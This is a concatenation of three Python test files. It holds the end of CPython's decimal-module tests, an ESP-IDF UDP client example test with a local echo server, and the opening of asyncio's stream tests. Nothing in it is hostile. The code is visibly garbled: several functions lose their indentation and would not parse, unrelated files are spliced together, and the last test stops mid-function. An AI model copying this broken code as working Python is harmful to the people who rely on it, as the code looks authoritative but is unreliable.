            Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
        )
        self.assertRaises(
            TypeError,
            Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
        )

        with localcontext() as c:
            c.clear_traps()

            # Invalid arguments
            self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
            self.assertRaises(TypeError, c.canonical, 200)
            self.assertRaises(TypeError, c.is_canonical, 200)
            self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
            self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")

            self.assertEqual(str(c.canonical(Decimal(200))), '200')
            self.assertEqual(c.radix(), 10)

            # divmod(9, 0) raises both DivisionByZero (for the quotient)
            # and InvalidOperation (for the remainder); whichever is
            # trapped propagates, the other shows up as a flag.
            c.traps[DivisionByZero] = True
            self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
            self.assertRaises(DivisionByZero, c.divmod, 9, 0)
            self.assertTrue(c.flags[InvalidOperation])

            c.clear_flags()
            c.traps[InvalidOperation] = True
            self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
            self.assertRaises(InvalidOperation, c.divmod, 9, 0)
            self.assertTrue(c.flags[DivisionByZero])

            # Three-arg pow requires an exact quotient at the current prec.
            c.traps[InvalidOperation] = True
            c.prec = 2
            self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
    def test_va_args_exceptions(self):
        # Keyword/positional argument validation for the varargs-style
        # method wrappers in _decimal.
        Decimal = C.Decimal
        Context = C.Context

        x = Decimal("10001111111")

        # Unary methods taking an optional context keyword.
        for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
                     'logb', 'logical_invert', 'next_minus', 'next_plus',
                     'normalize', 'number_class', 'sqrt', 'to_eng_string']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)

        # Binary methods taking an optional context keyword.
        for attr in ['compare', 'compare_signal', 'logical_and',
                     'logical_or', 'max', 'max_mag', 'min', 'min_mag',
                     'remainder_near', 'rotate', 'scaleb', 'shift']:
            func = getattr(x, attr)
            self.assertRaises(TypeError, func, context="x")
            self.assertRaises(TypeError, func, "x", context=None)

        # to_integral* take (rounding, context).
        self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral, [], [])

        self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_value, [], [])

        self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
        self.assertRaises(TypeError, x.to_integral_exact, [], [])

        self.assertRaises(TypeError, x.fma, 1, 2, context="x")
        self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)

        self.assertRaises(TypeError, x.quantize, 1, [], context=None)
        self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
        self.assertRaises(TypeError, x.quantize, 1, [], [])

        c = Context()
        self.assertRaises(TypeError, c.power, 1, 2, mod="x")
        self.assertRaises(TypeError, c.power, 1, "x", mod=None)
        self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
    @requires_extra_functionality
    def test_c_signal_dict(self):
        # SignalDict coverage
        Context = C.Context
        DefaultContext = C.DefaultContext

        InvalidOperation = C.InvalidOperation
        FloatOperation = C.FloatOperation
        DivisionByZero = C.DivisionByZero
        Overflow = C.Overflow
        Subnormal = C.Subnormal
        Underflow = C.Underflow
        Rounded = C.Rounded
        Inexact = C.Inexact
        Clamped = C.Clamped

        DecClamped = C.DecClamped
        DecInvalidOperation = C.DecInvalidOperation
        DecIEEEInvalidOperation = C.DecIEEEInvalidOperation

        def assertIsExclusivelySet(signal, signal_dict):
            # Assert that `signal` is the only key set in the dict.
            for sig in signal_dict:
                if sig == signal:
                    self.assertTrue(signal_dict[sig])
                else:
                    self.assertFalse(signal_dict[sig])

        c = DefaultContext.copy()

        # Signal dict methods
        self.assertTrue(Overflow in c.traps)
        c.clear_traps()
        for k in c.traps.keys():
            c.traps[k] = True
        for v in c.traps.values():
            self.assertTrue(v)
        c.clear_traps()
        for k, v in c.traps.items():
            self.assertFalse(v)

        self.assertFalse(c.flags.get(Overflow))
        self.assertIs(c.flags.get("x"), None)
        self.assertEqual(c.flags.get("x", "y"), "y")
        self.assertRaises(TypeError, c.flags.get, "x", "y", "z")

        self.assertEqual(len(c.flags), len(c.traps))
        s = sys.getsizeof(c.flags)
        s = sys.getsizeof(c.traps)
        s = c.flags.__repr__()

        # Set flags/traps via the raw bitmask attributes.
        c.clear_flags()
        c._flags = DecClamped
        self.assertTrue(c.flags[Clamped])

        c.clear_traps()
        c._traps = DecInvalidOperation
        self.assertTrue(c.traps[InvalidOperation])

        # Set flags/traps from dictionary.
        c.clear_flags()
        d = c.flags.copy()
        d[DivisionByZero] = True
        c.flags = d
        assertIsExclusivelySet(DivisionByZero, c.flags)

        c.clear_traps()
        d = c.traps.copy()
        d[Underflow] = True
        c.traps = d
        assertIsExclusivelySet(Underflow, c.traps)

        # Random constructors: map each Python signal class to its
        # libmpdec condition bit.
        IntSignals = {
          Clamped: C.DecClamped,
          Rounded: C.DecRounded,
          Inexact: C.DecInexact,
          Subnormal: C.DecSubnormal,
          Underflow: C.DecUnderflow,
          Overflow: C.DecOverflow,
          DivisionByZero: C.DecDivisionByZero,
          FloatOperation: C.DecFloatOperation,
          InvalidOperation: C.DecIEEEInvalidOperation
        }
        # Conditions that all collapse onto InvalidOperation.
        IntCond = [
          C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
          C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
          C.DecConversionSyntax,
        ]

        lim = len(OrderedSignals[C])
        for r in range(lim):
            for t in range(lim):
                for round in RoundingModes:
                    flags = random.sample(OrderedSignals[C], r)
                    traps = random.sample(OrderedSignals[C], t)
                    prec = random.randrange(1, 10000)
                    emin = random.randrange(-10000, 0)
                    emax = random.randrange(0, 10000)
                    clamp = random.randrange(0, 2)
                    caps = random.randrange(0, 2)
                    cr = random.randrange(0, 2)
                    c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
                                capitals=caps, clamp=clamp, flags=list(flags),
                                traps=list(traps))

                    self.assertEqual(c.prec, prec)
                    self.assertEqual(c.rounding, round)
                    self.assertEqual(c.Emin, emin)
                    self.assertEqual(c.Emax, emax)
                    self.assertEqual(c.capitals, caps)
                    self.assertEqual(c.clamp, clamp)

                    # The constructed bitmasks must be the OR of the
                    # requested signals' condition bits.
                    f = 0
                    for x in flags:
                        f |= IntSignals[x]
                    self.assertEqual(c._flags, f)

                    f = 0
                    for x in traps:
                        f |= IntSignals[x]
                    self.assertEqual(c._traps, f)

        for cond in IntCond:
            c._flags = cond
            self.assertTrue(c._flags&DecIEEEInvalidOperation)
            assertIsExclusivelySet(InvalidOperation, c.flags)

        for cond in IntCond:
            c._traps = cond
            self.assertTrue(c._traps&DecIEEEInvalidOperation)
            assertIsExclusivelySet(InvalidOperation, c.traps)
    def test_invalid_override(self):
        # Invalid locale overrides passed to __format__ must raise
        # ValueError rather than crash or produce garbage.
        Decimal = C.Decimal

        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            # Build a locale 'grouping' byte string from a list of ints.
            return ''.join([chr(x) for x in lst])

        def get_fmt(x, override=None, fmt='n'):
            return Decimal(x).__format__(fmt, override)

        invalid_grouping = {
            'decimal_point' : ',',
            'grouping' : make_grouping([255, 255, 0]),
            'thousands_sep' : ','
        }
        invalid_dot = {
            'decimal_point' : 'xxxxx',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
        }
        invalid_sep = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : 'yyyyy'
        }

        if CHAR_MAX == 127: # negative grouping in override
            self.assertRaises(ValueError, get_fmt, 12345,
                              invalid_grouping, 'g')

        self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
        self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
    def test_from_tuple(self):
        # Tuple construction at the ssize_t exponent limits: context
        # construction clamps/overflows/underflows, direct construction
        # traps InvalidOperation, and beyond ssize_t raises OverflowError.
        Decimal = C.Decimal
        localcontext = C.localcontext
        InvalidOperation = C.InvalidOperation
        Overflow = C.Overflow
        Underflow = C.Underflow

        with localcontext() as c:
            c.traps[InvalidOperation] = True
            c.traps[Overflow] = True
            c.traps[Underflow] = True

            # SSIZE_MAX
            x = (1, (), sys.maxsize)
            self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
            self.assertRaises(InvalidOperation, Decimal, x)

            x = (1, (0, 1, 2), sys.maxsize)
            self.assertRaises(Overflow, c.create_decimal, x)
            self.assertRaises(InvalidOperation, Decimal, x)

            # SSIZE_MIN
            x = (1, (), -sys.maxsize-1)
            self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
            self.assertRaises(InvalidOperation, Decimal, x)

            x = (1, (0, 1, 2), -sys.maxsize-1)
            self.assertRaises(Underflow, c.create_decimal, x)
            self.assertRaises(InvalidOperation, Decimal, x)

            # OverflowError
            x = (1, (), sys.maxsize+1)
            self.assertRaises(OverflowError, c.create_decimal, x)
            self.assertRaises(OverflowError, Decimal, x)

            x = (1, (), -sys.maxsize-2)
            self.assertRaises(OverflowError, c.create_decimal, x)
            self.assertRaises(OverflowError, Decimal, x)

            # Specials: "N" marks a signaling NaN; digits become the payload.
            x = (1, (), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN')
            x = (1, (0,), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN')
            x = (1, (0, 1), "N")
            self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
    """__sizeof__ must grow by exactly one machine word when the
    coefficient needs one more limb (8 bytes on a 64-bit libmpdec
    configuration, 4 bytes on a 32-bit one)."""
    Decimal = C.Decimal
    # A 64-bit build allows a much larger MAX_PREC; use that to detect
    # the limb width.
    have_config_64 = C.MAX_PREC > 425000000
    digits_per_word, word_size = (19, 8) if have_config_64 else (9, 4)

    self.assertGreater(Decimal(0).__sizeof__(), 0)

    smaller = Decimal(10 ** (digits_per_word * 24)).__sizeof__()
    larger = Decimal(10 ** (digits_per_word * 25)).__sizeof__()
    self.assertEqual(larger, smaller + word_size)
def test_internal_use_of_overridden_methods(self):
    """Decimal.from_float must not be derailed by float/int subclasses
    that override as_integer_ratio/__abs__/bit_length with bogus return
    values — the result must match from_float on the plain float."""
    Decimal = C.Decimal

    # Unsound subtyping: each class below lies through one of the
    # protocol methods a naive implementation might call internally.
    class X(float):
        def as_integer_ratio(self):
            return 1
        def __abs__(self):
            return self

    class Y(float):
        def __abs__(self):
            return [1]*200

    class I(int):
        def bit_length(self):
            return [1]*200

    class Z(float):
        def as_integer_ratio(self):
            # Returns int subclasses whose bit_length is also broken.
            return (I(1), I(1))
        def __abs__(self):
            return self

    for cls in X, Y, Z:
        self.assertEqual(Decimal.from_float(cls(101.1)),
                         Decimal.from_float(101.1))
def test_maxcontext_exact_arith(self):
    """Exact operations under a maximum-size context must not blow up.

    Make sure that exact operations do not raise MemoryError due
    to huge intermediate values when the context precision is very
    large.
    """

    # The following functions fill the available precision and are
    # therefore not suitable for large precisions (by design of the
    # specification).
    MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
                      'logical_and', 'logical_or', 'logical_xor',
                      'next_toward', 'rotate', 'shift']

    Decimal = C.Decimal
    Context = C.Context
    localcontext = C.localcontext

    # Here only some functions that are likely candidates for triggering a
    # MemoryError are tested. deccheck.py has an exhaustive test.
    maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
    with localcontext(maxcontext):
        # All of these have small exact results despite the huge precision.
        self.assertEqual(Decimal(0).exp(), 1)
        self.assertEqual(Decimal(1).ln(), 0)
        self.assertEqual(Decimal(1).log10(), 0)
        self.assertEqual(Decimal(10**2).log10(), 2)
        self.assertEqual(Decimal(10**223).log10(), 223)
        self.assertEqual(Decimal(10**19).logb(), 19)
        self.assertEqual(Decimal(4).sqrt(), 2)
        self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
        self.assertEqual(divmod(Decimal(10), 3), (3, 1))
        self.assertEqual(Decimal(10) // 3, 3)
        self.assertEqual(Decimal(4) / 2, 2)
        self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
    """Function signatures"""

    def test_inspect_module(self):
        """Module-level callables: the C implementation's signatures must
        match the Python implementation's (underscore-prefixed parameters
        on the Python side are considered private and ignored)."""
        for attr in dir(P):
            if attr.startswith('_'):
                continue
            p_func = getattr(P, attr)
            c_func = getattr(C, attr)
            if (attr == 'Decimal' or attr == 'Context' or
                inspect.isfunction(p_func)):
                p_sig = inspect.signature(p_func)
                c_sig = inspect.signature(c_func)

                # parameter names:
                c_names = list(c_sig.parameters.keys())
                p_names = [x for x in p_sig.parameters.keys() if not
                           x.startswith('_')]

                self.assertEqual(c_names, p_names,
                                 msg="parameter name mismatch in %s" % p_func)

                c_kind = [x.kind for x in c_sig.parameters.values()]
                p_kind = [x[1].kind for x in p_sig.parameters.items() if not
                          x[0].startswith('_')]

                # parameters:
                if attr != 'setcontext':
                    self.assertEqual(c_kind, p_kind,
                                     msg="parameter kind mismatch in %s" % p_func)

    def test_inspect_types(self):
        """Decimal and Context methods: compare parameter names and kinds
        between C and P, then actually call each method with plausible
        arguments constructed from its signature."""

        POS = inspect._ParameterKind.POSITIONAL_ONLY
        POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD

        # Type heuristic (type annotations would help!): map parameter
        # name -> a plausible argument value for each implementation.
        pdict = {C: {'other': C.Decimal(1),
                     'third': C.Decimal(1),
                     'x': C.Decimal(1),
                     'y': C.Decimal(1),
                     'z': C.Decimal(1),
                     'a': C.Decimal(1),
                     'b': C.Decimal(1),
                     'c': C.Decimal(1),
                     'exp': C.Decimal(1),
                     'modulo': C.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': C.ROUND_HALF_UP,
                     'context': C.getcontext()},
                 P: {'other': P.Decimal(1),
                     'third': P.Decimal(1),
                     'a': P.Decimal(1),
                     'b': P.Decimal(1),
                     'c': P.Decimal(1),
                     'exp': P.Decimal(1),
                     'modulo': P.Decimal(1),
                     'num': "1",
                     'f': 1.0,
                     'rounding': P.ROUND_HALF_UP,
                     'context': P.getcontext()}}

        def mkargs(module, sig):
            """Build (args, kwargs) for calling a method with *sig*,
            looking argument values up by parameter name in pdict."""
            args = []
            kwargs = {}
            for name, param in sig.parameters.items():
                if name == 'self': continue
                if param.kind == POS:
                    args.append(pdict[module][name])
                elif param.kind == POS_KWD:
                    kwargs[name] = pdict[module][name]
                else:
                    raise TestFailed("unexpected parameter kind")
            return args, kwargs

        def tr(s):
            """The C Context docstrings use 'x' in order to prevent confusion
            with the article 'a' in the descriptions."""
            if s == 'x': return 'a'
            if s == 'y': return 'b'
            if s == 'z': return 'c'
            return s

        def doit(ty):
            """Run the name/kind comparison and the call check for every
            public method of type *ty* ('Decimal' or 'Context')."""
            p_type = getattr(P, ty)
            c_type = getattr(C, ty)
            for attr in dir(p_type):
                if attr.startswith('_'):
                    continue
                p_func = getattr(p_type, attr)
                c_func = getattr(c_type, attr)
                if inspect.isfunction(p_func):
                    p_sig = inspect.signature(p_func)
                    c_sig = inspect.signature(c_func)

                    # parameter names:
                    p_names = list(p_sig.parameters.keys())
                    c_names = [tr(x) for x in c_sig.parameters.keys()]

                    self.assertEqual(c_names, p_names,
                                     msg="parameter name mismatch in %s" % p_func)

                    p_kind = [x.kind for x in p_sig.parameters.values()]
                    c_kind = [x.kind for x in c_sig.parameters.values()]

                    # 'self' parameter:
                    self.assertIs(p_kind[0], POS_KWD)
                    self.assertIs(c_kind[0], POS)

                    # remaining parameters:
                    if ty == 'Decimal':
                        self.assertEqual(c_kind[1:], p_kind[1:],
                                         msg="parameter kind mismatch in %s" % p_func)
                    else: # Context methods are positional only in the C version.
                        self.assertEqual(len(c_kind), len(p_kind),
                                         msg="parameter kind mismatch in %s" % p_func)

                    # Run the function:
                    args, kwds = mkargs(C, c_sig)
                    try:
                        getattr(c_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))

                    args, kwds = mkargs(P, p_sig)
                    try:
                        getattr(p_type(9), attr)(*args, **kwds)
                    except Exception:
                        raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))

        doit('Decimal')
        doit('Context')
# Test classes are interleaved as (C variant, Python variant) pairs; the
# [1::2] slice below relies on this ordering to keep only the Python halves.
all_tests = [
  CExplicitConstructionTest, PyExplicitConstructionTest,
  CImplicitConstructionTest, PyImplicitConstructionTest,
  CFormatTest,               PyFormatTest,
  CArithmeticOperatorsTest,  PyArithmeticOperatorsTest,
  CThreadingTest,            PyThreadingTest,
  CUsabilityTest,            PyUsabilityTest,
  CPythonAPItests,           PyPythonAPItests,
  CContextAPItests,          PyContextAPItests,
  CContextWithStatement,     PyContextWithStatement,
  CContextFlags,             PyContextFlags,
  CSpecialContexts,          PySpecialContexts,
  CContextInputValidation,   PyContextInputValidation,
  CContextSubclassing,       PyContextSubclassing,
  CCoverage,                 PyCoverage,
  CFunctionality,            PyFunctionality,
  CWhitebox,                 PyWhitebox,
  CIBMTestCases,             PyIBMTestCases,
]

# Delete C tests if _decimal.so is not present.
if not C:
    all_tests = all_tests[1::2]
else:
    # CheckAttributes and SignatureTest compare C against P directly, so
    # they only make sense when the C module is available.
    all_tests.insert(0, CheckAttributes)
    all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
    """ Execute the tests.

    Runs all arithmetic tests if arith is True or if the "decimal" resource
    is enabled in regrtest.py

    todo_tests, when given, restricts the run to the named .decTest files.
    """

    init(C)
    init(P)
    global TEST_ALL, DEBUG
    TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
    DEBUG = debug

    if todo_tests is None:
        test_classes = all_tests
    else:
        # Only the data-driven IBM test-case classes honor todo_tests.
        test_classes = [CIBMTestCases, PyIBMTestCases]

    # Dynamically build custom test definition for each file in the test
    # directory and add the definitions to the DecimalTest class. This
    # procedure insures that new files do not get skipped.
    for filename in os.listdir(directory):
        if '.decTest' not in filename or filename.startswith("."):
            continue
        head, tail = filename.split('.')
        if todo_tests is not None and head not in todo_tests:
            continue
        # f=filename binds the current filename at definition time
        # (avoids the late-binding-closure pitfall in the loop).
        tester = lambda self, f=filename: self.eval_file(directory + f)
        setattr(CIBMTestCases, 'test_' + head, tester)
        setattr(PyIBMTestCases, 'test_' + head, tester)
    del filename, head, tail, tester

    try:
        run_unittest(*test_classes)
        if todo_tests is None:
            from doctest import IGNORE_EXCEPTION_DETAIL
            # Doctests in C/P reference the name 'decimal'; temporarily
            # install each implementation under that name while running.
            savedecimal = sys.modules['decimal']
            if C:
                sys.modules['decimal'] = C
                run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
            sys.modules['decimal'] = P
            run_doctest(P, verbose)
            sys.modules['decimal'] = savedecimal
    finally:
        # Always restore the contexts saved by init().
        if C: C.setcontext(ORIGINAL_CONTEXT[C])
        P.setcontext(ORIGINAL_CONTEXT[P])

        if not C:
            warnings.warn('C tests skipped: no module named _decimal.',
                          UserWarning)
        if not orig_sys_decimal is sys.modules['decimal']:
            raise TestFailed("Internal error: unbalanced number of changes to "
                             "sys.modules['decimal'].")
if __name__ == '__main__':
    # Command-line entry point: run everything, a skipped subset, or only
    # the named .decTest files.
    import optparse
    p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
    p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
    p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
    (opt, args) = p.parse_args()

    if opt.skip:
        test_main(arith=False, verbose=True)
    elif args:
        # Positional arguments name specific .decTest files to run.
        test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
    else:
        test_main(arith=True, verbose=True)
|
example_test.py | # This example code is in the Public Domain (or CC0 licensed, at your option.)
# Unless required by applicable law or agreed to in writing, this
# software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied.
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from builtins import input
import os
import re
import netifaces
import socket
from threading import Thread, Event
import ttfw_idf
import sys
# ----------- Config ----------
PORT = 3333
INTERFACE = 'eth0'
# -------------------------------
def get_my_ip(type):
    """Return the first address of the given family on INTERFACE, with
    any '%<iface>' zone suffix (IPv6 link-local) stripped."""
    zone_suffix = "%{}".format(INTERFACE)
    for entry in netifaces.ifaddresses(INTERFACE)[type]:
        return entry['addr'].replace(zone_suffix, "")
class UdpServer:
    """Context-managed UDP echo server running in a background thread.

    In non-persistent mode the server handles a single datagram and
    exits; in persistent mode it loops until __exit__ unblocks it by
    sending a sentinel datagram to itself.
    """

    def __init__(self, port, family_addr, persist=False):
        self.port = port
        self.family_addr = family_addr
        self.socket = socket.socket(family_addr, socket.SOCK_DGRAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Bounded recvfrom wait so a stuck test eventually fails.
        self.socket.settimeout(30.0)
        self.shutdown = Event()
        self.persist = persist

    def __enter__(self):
        try:
            self.socket.bind(('', self.port))
        except socket.error as e:
            print("Bind failed:{}".format(e))
            raise

        self.server_thread = Thread(target=self.run_server)
        self.server_thread.start()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        if self.persist:
            # Wake the blocking recvfrom in run_server with a sentinel
            # datagram so the thread can observe the shutdown flag.
            sock = socket.socket(self.family_addr, socket.SOCK_DGRAM)
            sock.sendto(b'Stop', ('localhost', self.port))
            sock.close()
        self.shutdown.set()
        self.server_thread.join()
        self.socket.close()

    def run_server(self):
        # Echo loop: reply 'OK: <data>' to every datagram received.
        while not self.shutdown.is_set():
            try:
                data, addr = self.socket.recvfrom(1024)
                if not data:
                    return
                data = data.decode()
                print('Reply[' + addr[0] + ':' + str(addr[1]) + '] - ' + data)
                reply = 'OK: ' + data
                self.socket.sendto(reply.encode(), addr)
            except socket.error as e:
                print("Running server failed:{}".format(e))
                raise
            if not self.persist:
                break
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_socket(env, extra_data):
    """
    steps:
      1. join AP
      2. have the board connect to the server
      3. send and receive data
    """
    dut1 = env.get_dut("udp_client", "examples/protocols/sockets/udp_client", dut_class=ttfw_idf.ESP32DUT)
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "udp_client.bin")
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance("udp_client_bin_size", "{}KB".format(bin_size // 1024))

    # start test
    dut1.start_app()

    # Wait for the board to report its IPv4 address on the console.
    data = dut1.expect(re.compile(r" IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"), timeout=30)
    print("Connected with IPv4: {}".format(data[0]))

    # test IPv4: the board is told the host's address, sends a datagram,
    # and must see the server's echo.
    with UdpServer(PORT, socket.AF_INET):
        dut1.write(get_my_ip(netifaces.AF_INET))
        dut1.expect(re.compile(r"OK: Message from ESP32"))

    # test IPv6
    with UdpServer(PORT, socket.AF_INET6):
        dut1.write(get_my_ip(netifaces.AF_INET6))
        dut1.expect(re.compile(r"OK: Message from ESP32"))
if __name__ == '__main__':
    # Stand-alone mode: run just the echo server for manual testing.
    if sys.argv[1:] and sys.argv[1].startswith("IPv"):  # if additional arguments provided:
        # Usage: example_test.py <IPv4|IPv6>
        family_addr = socket.AF_INET6 if sys.argv[1] == "IPv6" else socket.AF_INET
        with UdpServer(PORT, family_addr, persist=True) as s:
            # Block until the operator presses Enter, then the context
            # manager shuts the server down.
            print(input("Press Enter to stop the server..."))
    else:
        test_examples_protocol_socket()
|
test_streams.py | """Tests for streams.py."""
import contextlib
import gc
import io
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio.streams import _StreamProtocol, _ensure_can_read, _ensure_can_write
from test.test_asyncio import utils as test_utils
def tearDownModule():
    # Reset to the default event loop policy so this module does not leak
    # policy state into other test modules.
    asyncio.set_event_loop_policy(None)
class StreamModeTests(unittest.TestCase):
    """The mode guards: reading a write-only stream and writing a
    read-only stream must both raise RuntimeError."""

    def test__ensure_can_read_ok(self):
        self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READ))
        self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READWRITE))

    def test__ensure_can_read_fail(self):
        with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
            _ensure_can_read(asyncio.StreamMode.WRITE)

    def test__ensure_can_write_ok(self):
        self.assertIsNone(_ensure_can_write(asyncio.StreamMode.WRITE))
        self.assertIsNone(_ensure_can_write(asyncio.StreamMode.READWRITE))

    def test__ensure_can_write_fail(self):
        with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
            _ensure_can_write(asyncio.StreamMode.READ)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
    # Fresh event loop per test, registered with the asyncio test-case
    # machinery so it is tracked and checked.
    super().setUp()
    self.loop = asyncio.new_event_loop()
    self.set_event_loop(self.loop)

def tearDown(self):
    # just in case if we have transport close callbacks
    test_utils.run_briefly(self.loop)

    self.loop.close()
    gc.collect()
    super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
    # With no explicit loop argument, Stream falls back to the global
    # events.get_event_loop().
    stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
                            _asyncio_internal=True)
    self.assertIs(stream._loop, m_events.get_event_loop.return_value)

def _basetest_open_connection(self, open_connection_fut):
    # Shared body for the TCP and Unix-socket open_connection tests:
    # issue an HTTP/1.0 request and check status line and body tail.
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
    with self.assertWarns(DeprecationWarning):
        reader, writer = self.loop.run_until_complete(open_connection_fut)
    writer.write(b'GET / HTTP/1.0\r\n\r\n')
    f = reader.readline()
    data = self.loop.run_until_complete(f)
    self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
    f = reader.read()
    data = self.loop.run_until_complete(f)
    self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
    writer.close()
    # No exceptions may have reached the loop's exception handler.
    self.assertEqual(messages, [])

def test_open_connection(self):
    with test_utils.run_test_server() as httpd:
        conn_fut = asyncio.open_connection(*httpd.address,
                                           loop=self.loop)
        self._basetest_open_connection(conn_fut)

@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
    with test_utils.run_test_unix_server() as httpd:
        conn_fut = asyncio.open_unix_connection(httpd.address,
                                                loop=self.loop)
        self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
    # Like _basetest_open_connection but over SSL; the event loop is
    # unset after connecting to prove the streams keep working without
    # a current loop.
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
    try:
        with self.assertWarns(DeprecationWarning):
            reader, writer = self.loop.run_until_complete(
                open_connection_fut)
    finally:
        asyncio.set_event_loop(None)
    writer.write(b'GET / HTTP/1.0\r\n\r\n')
    f = reader.read()
    data = self.loop.run_until_complete(f)
    self.assertTrue(data.endswith(b'\r\n\r\nTest message'))

    writer.close()
    self.assertEqual(messages, [])

@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
    with test_utils.run_test_server(use_ssl=True) as httpd:
        conn_fut = asyncio.open_connection(
            *httpd.address,
            ssl=test_utils.dummy_ssl_context(),
            loop=self.loop)

        self._basetest_open_connection_no_loop_ssl(conn_fut)

@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
    with test_utils.run_test_unix_server(use_ssl=True) as httpd:
        conn_fut = asyncio.open_unix_connection(
            httpd.address,
            ssl=test_utils.dummy_ssl_context(),
            server_hostname='',
            loop=self.loop)

        self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
    # A connection_lost() with an exception must surface to readers.
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
    with self.assertWarns(DeprecationWarning):
        reader, writer = self.loop.run_until_complete(open_connection_fut)
    writer._protocol.connection_lost(ZeroDivisionError())
